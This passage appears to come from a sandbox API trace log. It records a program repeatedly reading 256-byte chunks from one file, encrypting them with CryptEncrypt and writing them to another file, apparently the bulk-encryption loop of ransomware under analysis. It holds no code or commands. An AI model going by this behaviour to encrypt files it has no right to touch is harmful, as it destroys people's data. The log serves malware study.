lpOverlapped=0x0) returned 1 [0145.303] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.303] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.303] GetLastError () returned 0x0 [0145.303] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.303] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.303] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.303] GetLastError () returned 0x0 [0145.303] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.303] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.303] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.303] GetLastError () returned 0x0 [0145.303] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.303] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.303] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.303] GetLastError () returned 0x0 [0145.303] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.303] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.303] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.303] GetLastError () returned 0x0 [0145.303] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.303] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.303] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.303] GetLastError () returned 0x0 [0145.303] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.304] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.304] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.304] GetLastError () returned 0x0 [0145.304] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.304] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.304] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.304] GetLastError () returned 0x0 [0145.304] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.304] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.304] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.304] GetLastError () returned 0x0 [0145.304] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.304] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.304] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.304] GetLastError () returned 0x0 [0145.304] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.304] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.304] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.304] GetLastError () returned 0x0 [0145.304] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.304] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.304] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.304] GetLastError () returned 0x0 [0145.304] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.304] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.305] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.305] GetLastError () returned 0x0 [0145.305] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.305] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.305] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.305] GetLastError () returned 0x0 [0145.305] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.305] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.305] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.305] GetLastError () returned 0x0 [0145.305] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.305] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.305] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.305] GetLastError () returned 0x0 [0145.305] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.305] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.305] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.305] GetLastError () returned 0x0 [0145.305] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.306] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.306] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.306] GetLastError () returned 0x0 [0145.306] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.306] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.306] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.306] GetLastError () returned 0x0 [0145.306] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.306] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.306] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.306] GetLastError () returned 0x0 [0145.306] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.306] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.306] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.306] GetLastError () returned 0x0 [0145.306] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.306] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.306] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.306] GetLastError () returned 0x0 [0145.306] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.306] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.306] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.306] GetLastError () returned 0x0 [0145.306] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.306] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.307] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.307] GetLastError () returned 0x0 [0145.307] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.307] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.307] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.307] GetLastError () returned 0x0 [0145.307] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.307] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.307] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.307] GetLastError () returned 0x0 [0145.307] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.307] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.307] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.307] GetLastError () returned 0x0 [0145.307] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.307] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.307] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.307] GetLastError () returned 0x0 [0145.307] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.307] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.307] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.307] GetLastError () returned 0x0 [0145.307] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.307] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.308] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.308] GetLastError () returned 0x0 [0145.308] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.308] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.308] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.308] GetLastError () returned 0x0 [0145.308] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.308] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.308] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.308] GetLastError () returned 0x0 [0145.308] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.308] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, 